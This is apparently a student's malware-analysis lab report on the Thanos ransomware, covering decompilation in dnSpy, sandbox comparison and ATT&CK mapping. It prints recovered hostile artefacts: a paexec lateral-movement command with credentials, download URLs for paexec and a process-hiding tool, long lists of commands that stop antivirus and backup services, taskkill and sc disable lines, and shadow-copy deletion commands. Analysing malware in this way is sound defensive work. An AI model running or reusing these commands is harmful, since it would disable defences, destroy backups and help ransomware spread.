:::success
# OT Lab 4 - Malware Analysis
:::
## Task 1: Set up your environment.
:::info
1. Prepare and secure malware analysis environment for example FLARE VM. Make sure that VM uses a HOST ONLY network adapter.
2. Use any virtualization environment, better to use the latest version (check repo and official website).
3. Or you can create a Virtual Machine and set it up as a malware analysis environment.
:::
I chose to just install a virtual machine with Windows 7. Because I initially chose the most vulnerable environment, and as you know, Win7 is perfect for this.
## Task 2 - Let’s get some malware
:::info
1. Download some malware/ransomware from the Internet (for example, TheZoo repo). Please be careful when you run them, THESE ARE REAL MALWARE.
2. Select at least two malware that you want to analyze in a malware analysis environment.
:::
From the proposed repository of TheZoo, I chose [ransomeware Thanos](https://github.com/ytisf/theZoo/tree/master/malware/Binaries/Ransomware.Thanos).
## Task 3 - Static Analysis
:::info
1. Use any tool for static analysis of your selected malware.
:::
First of all, I need to investigate what the file is. Using the **Detect It Easy** tool, I found out that this is a PE file and that it was compiled using VB.NET. However, the program failed to detect the packer and the obfuscator.
<center>
</center>
However, for the other files in the folder, something was found. Here we are dealing with an executable file .NET, confused by using .NET Reactor and another file confused with Smart Assembly. This is kind of good news, because we can easily compile an executable file into source code, even if that source is confusing.
<center>
</center>
1. [58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f ](https://www.virustotal.com/gui/file/58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f/detection) (Final-02.exe)
2. [5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d](https://www.virustotal.com/gui/file/5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d/details) (Client-2.exe)
3. [ae66e009e16f0fad3b70ad20801f48f2edb904fa5341a89e126a26fd3fc80f75](https://www.virustotal.com/gui/file/ae66e009e16f0fad3b70ad20801f48f2edb904fa5341a89e126a26fd3fc80f75/details) (Unknown)
4. [c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850](https://www.virustotal.com/gui/file/c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850/details) (Final-02.exe + Smart Assembly)
I decided to proceed as follows: I have two files for which an obfuscator has been detected, and two are not. However, I am sure for sure that the file ending in `513c171f` is the main one, because it is most often found on the network under the name Thanos, and the file ending in `ea123850` and assembled using Smart Assembly, the Virus Total is defined with the same file name as `513c171f` (Final-02.exe ). I will assume that they may be more related to each other than the rest of the files. And I will work with them.
I will start working with the very first file, because it has the most mentions of the name of my vulnerability (Final-02.exe , thanos1.exe , thanos47.exe , thanos4720210227233714.exe and so on), and I considered it the main one.
The source code of this file is confusing. I tried to deobfuscate this sample using de4dot, but the tool found an unknown obfuscator in the sample and could not deobfuscate it.
<center>
</center>
When analyzing the decompiled code in dnspy, I found several switches that determine which functions are enabled. The variable names were also confusing.
I was interested to see if it is possible to find this code in the second file that is subject to deobfuscation.
However, unfortunately, although some of the names were deciphered, most of the names still remained encrypted. So I just had to keep digging further into the code.
I was interested in exactly those functions whose flag is switched to **YES**. For example, with the help of it, I was able to find part of the code in which the network download is performed.
The malware will download "paexec" from the following URL:
> `https://www.poweradmin.com/paexec/paexec.exe`
Save it to a folder `C:\Users \[user name]\AppData\Local\Temp\`. It then uses "paexec" to install malware on the other machines. You can see that he is uploading all his malicious junk to other nodes.
```
IyUWqQZlcOSTLhq.tbluQOozLSqDhFc(text, "\\" + text3 + " -u SHJPOLICE\\amer -p !Omar2012 -d -f -h -s -n 2 -c " + Assembly.GetEntryAssembly().Location);
```
I continued to decrypt the strings. And here I found a new URI-address leading to another file.
> `https://raw.githubusercontent.com/d35ha/ProcessHide/master/bins/ProcessHide64.exe`
>`https://raw.githubusercontent.com/d35ha/ProcessHide/master/bins/ProcessHide32.exe`
This **Process Hide** tool is used to hide processes from any monitoring tool using NtQuerySystemInformation.
I also found debugging protection, as you can understand from the comments on the technical documentation, malware deliberately restricts access to its debugging.
> Some operating system processes are executed in a special mode. An attempt to read properties or join these processes is not possible unless you have called the Enter Debug Mode component.
It's trite, but due to the fact that I didn't understand the names of variables at all, I had to pay more attention to comments and string searches. So I'm the part of the code that mentioned virtual machines.
And then I found confirmation that if malware found itself in a virtual machine, it killed itself.
As you can see from the screenshot above, there are 5 such conditions in total. Let's look at everything.
Here the program runs the `CheckRemoteDebuggerPresent()` function to check the debug connection to the process.
Here the program looks for whether it is loaded `sbiedll.dll` by calling `GetModuleHandleA`. These files most often belong to product Sandboxie. So I can assume that in this case it determines whether it is running inside the Windows sandbox.
> GetModuleHandleA Retrieves a module handle for the specified module. The module must have been loaded by the calling process.
It checks whether malware is running on a system with a small amount of root directory or hard disk. Perhaps this is also used to determine whether the program is running in a virtual environment or not.
And here the program checks whether the host is a Windows XP-based machine. At this stage, it is not yet clear to me why a host on an old operating system is the cause of malware self-destruction.
I also managed to find some malware manipulations related to Windows Defender. Judging by the link from the code, it sets different values of keys in Windows registers. It is logical that this is used to bypass the basic protection of the system.
Further on, you can see from the code that the program, after installing its keys in the Windows registry, can call the following function to secretly launch PowerShell. And below is a whole list of Windows Defender functions that the program deactivates. The following code is used to set a number of MpPreference parameters that are designed to bypass Windows Defender detection.
> The Get-MpPreference cmdlet gets the settings for scanning and Windows Defender updates.
Here you can see the moment when the malicious procexp process is hidden using the ProcessHacker tool.
```
> Taskmgr
> taskmgr
> ProcessHacker
> procexp
```
As you have already understood, I really like to decode lines. Therefore, I decoded all these, there were a lot of them, apparently some big monster was sitting in them. And it was already clear from the first that the process was engaged in stopping all kinds of popular antiviruses.
```
> stop avpsus /y
> stop McAfeeDLPAgentService /y
> etc
```
:::spoiler
BMR Boot Service /y
NetBackup BMR MTFTP Service /y
DefWatch /y
ccEvtMgr /y
ccSetMgr /y
SavRoam /y
RTVscan /y
QBFCService /y
QBIDPService /y
Intuit.QuickBooks.FCS /y
QBCFMonitorService /y
YooBackup /y
YooIT /y
zhudongfangyu /y
stc_raw_agent /y
VSNAPVSS /y
VeeamTransportSvc /y
VeeamDeploymentService /y
VeeamNFSSvc /y
veeam /y
PDVFSService /y
BackupExecVSSProvider /y
BackupExecAgentAccelerator /y
BackupExecAgentBrowser /y
BackupExecDiveciMediaService /y
BackupExecJobEngine /y
BackupExecManagementService /y
BackupExecRPCService /y
AcrSch2Svc /y
AcronisAgent /y
CASAD2DWebSvc /y
CAARCUpdateSvc /y
sophos /y
:::
All this was handled by the process net.exe
Below there are more processes that deal with different things, for example, `taskkill.exe` start the program `mydesktopservice.exe`, that uses ports to connect to or from a LAN or the Internet. MyDesktopService.exe is able to connect to the Internet, record keyboard and mouse inputs and monitor applications. All this is necessary to prevent malware from shutting down.
```
> taskkill.exe
/IM mspub.exe /F
/IM mydesktopqos.exe /F
/IM mydesktopservice.exe /F
```
```
> sc.exe
config SQLTELEMETRY start= disabled
config SQLTELEMETRY$ECWDB2 start= disabled
config SQLWriter start= disabled
config SstpSvc start= disabled
```
In addition, the malware also executes delete command to delete shadow copies.
> Delete Shadows /all /quiet
> resize shadowstorage /for=c: /on=c: /maxsize=401MB
> resize shadowstorage /for=c: /on=c: /maxsize=unbounded
> resize shadowstorage /for=d: /on=d: /maxsize=401MB
> resize shadowstorage /for=d: /on=d: /maxsize=unbounded
> resize shadowstorage /for=e: /on=e: /maxsize=401MB
> resize shadowstorage /for=e: /on=e: /maxsize=unbounded
> resize shadowstorage /for=f: /on=f: /maxsize=401MB
> resize shadowstorage /for=f: /on=f: /maxsize=unbounded
> resize shadowstorage /for=g: /on=g: /maxsize=401MB
> resize shadowstorage /for=g: /on=g: /maxsize=unbounded
> resize shadowstorage /for=h: /on=h: /maxsize=401MB
> resize shadowstorage /for=h: /on=h: /maxsize=unbounded
> Delete Shadows /all /quiet
I managed to find the `Main()` function! Wow, this is probably the best that the deobfuscator could offer. If you look into it, you can actually see most of the work of the malware. For example, I was attracted to a large text in Base64 encoding. Judging by the comments, it is contained in a certain file `HOW_TO_DECYPHER_FILES.txt`.
If you decrypt it, it turns out that it leads to a page like this.
Judging by the content, there should have been a cool background with a skull, however, unfortunately, the link to it is no longer available.
In fact, all I did next was look through tons of lines of code (not much fun). I managed to find the formats that the virus encrypts.
```
dat, txt, jpeg, gif, jpg, png, php, cs, cpp, rar, zip, html,
htm, xlsx, xls, avi, mp4, ppt, doc, docx, sxi, sxw, odt,
hwp, tar , bz2, mkv, eml, msg, ost, pst, edb, sql, accdb,
mdb, dbf, odb, myd, php, java, cpp, pas, asm, key, pfx, pem,
p12, csr, gpg, aes , vsd, odg, raw, nef, svg, psd, vmx,
vmdk, vdi, lay6, sqlite3, sqlitedb, accdb, java, class,
mpeg, djvu, tiff, backup, pdf, cert, docm, xlsm, dwg, bak ,
qbw, nd, tlg, lgb, pptx, mov, xdw, ods, wav, mp3, aiff,
flac, m4a, csv, sql, ora, mdf, ldf, ndf, dtsx, rdl, dim,
mrimg, qbb, rtf , 7з
```
It also contains an interesting condition for checking the operating system version, specifically the program is interested in if the system is not Windows 8 and 10.
Let's see what she will do. This code is read from below. It turns out that if this method jMDFRLEyorejfI.tTkvXnIXBUwQ() is not played, then the program sets the reboot mode for a secure boot using the network and then reboots.
> shutdown /r /t 0 - restart the local computer immediately
The malware forces the systems of a particular version to run in secure boot mode in order to bypass the detection of antivirus software.
Otherwise, it expects the return of the system boot type (value 67) not equal to zero. Where 0 is the standard load.
```
return jMDFRLEyorejfI.GetSystemMetrics(67) != 0;
```
> Returns the value of the component of the current Version object, which represents an additional number in the version number.
At this stage, this is all that I managed to find simply by the readable words that I saw in the code.
:::info
2. Now try to use other online tools, upload the malware and see what artifact it detects.
3. Compare the findings of both methods, and see if there are some artifacts that online tools did not manage to find, or vice versa. For example, a piece of code or information that helps you in your analysis.
:::
Here is [my report](https://any.run/report/58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f/9a6834fe-cacf-4bc6-b4e2-a9becb33eec2
) from the run.any website. In the process of searching and researching, I came across several more reports of my file. Unfortunately, my report does not contain a full-fledged image of the work of this virus, as, for example, [here text](https://app.any.run/tasks/e2ef6d92-1b44-45bd-a60d-17865685bb13/).
Although this is not the main thing, but I saw what that skull looked like, located along a non-existent path.
<center>
</center>
If you believe the sandbox, then I found almost all the methods used by the malware, but I did not find the exact names of the processes that initiate it. For example, `reg.exe`, which removes the secure boot key from the registry and changes the auxiliary login/logout path in the registry.
But from positive examples, I showed you in static analysis what functions it performs `net.exe` , what a large number of antivirus programs it stops (in addition to Windows Defender). Whereas I couldn't find this in the online sandbox, you can look at two reports (mine and someone else's), there is no mention of this.
I couldn't find the process manually `net1.exe` as it is written in the online report, it turns out that it collects the current time of the system. `bcdedit.exe` it was also not found by me, although I showed the part of the code that it executes.
I restarted the report several times and used different files (I tried a deobfuscated file). But I never saw in the online sandbox at least a hint of the Windows sandbox bypass functions embedded in the malware. Although I know that, for example, in the laboratory work from Group-IB, some examples had this stage in the MITRE matrix. Perhaps the whole point is that this online sandbox does not provide such high-quality resources, as, for example, it does not provide a 64-bit version of Windows for free. But thanks to someone else's report, I was able to analyze the differences in the launch, and thanks to someone else's report, you can see why this extortionist once worked, but now it doesn't. This is because those links from which he loaded tools with him, for example, like that link to the process monitoring concealment tool or even a picture of a skull - they are no longer available on the network. But thanks to the old version of the report, made almost in the same month that the attack by this extortionist was first recorded, I was able to see how everything looked while the chain was intact.
In general, it was not so important from a technical point of view, in terms of, if we are talking about the reverse of the malware code. But if we consider the whole analysis, then I think it is important. As well as the opportunity to see the chain of Internet requests that he sent during his activity.
By the way, here I also did not see how the malvar downloads the `paexec.exe` file, about the link to which I wrote to you at the very beginning of the static report.
One more remark that I want to leave at the end, neither the sandbox nor, unfortunately, I could not find the file encryption process itself. I showed you the formats that are subject to encryption, for myself I found a mention of the RSA key in base64 encoding. However, I didn't have enough skills to fully understand the whole process. And at some point I got the impression that I was missing some other files, although all the files that I downloaded carried the same Final-02.exe.
:::info
4. Try to describe which method is better (Sandboxing V.S. Static analysis) is better, and which one is more useful in which case.
:::
It is very difficult to assess this, each tool is good in one way or another. Without an online tool, I would not have been able to assemble the chain of events myself, but without static analysis I would not have been able to supplement it. So I think such online sandboxes are good when you want to see the whole picture after you've spent a lot of time looking at its pieces.
But at the same time, I think it should work in pairs. For example, I initially launched a malicious file in an online sandbox, realized what key points I should pay attention to when I open the naked code. And after that it was much easier for me to do this lab.
## Task 4 - Mapping to ATT&CK mitre framework
:::info
Map the malware that you have selected to the ATT&CK MATRIX.
:::
The table with the help of online tools was prepared by MITRE ATT&CK:
___________________________________________________________
### Tools:
1. [Detect It Easy v3.04](https://github.com/horsicq/Detect-It-Easy)
2. [de4dot](https://github.com/de4dot/de4dot)
3. [NETReactorSlayer](https://github.com/SychicBoy/NETReactorSlayer)
4. [dnSpy](https://github.com/dnSpy/dnSpy)
5. [Systemexplorer.net](https://systemexplorer.net/ru)
*Well, at the end, when I had already completed the entire report, I checked the file that I ignored, so that the answer to all my questions was found in a separate application for this malware - Client-2.exe. At first I couldn't open it on a virtual machine, however, as it turned out, it contains a completely deobfuscated malware code. However, I still showed you 70% of all the main work of the application.
Sign in with Wallet
Connect another wallet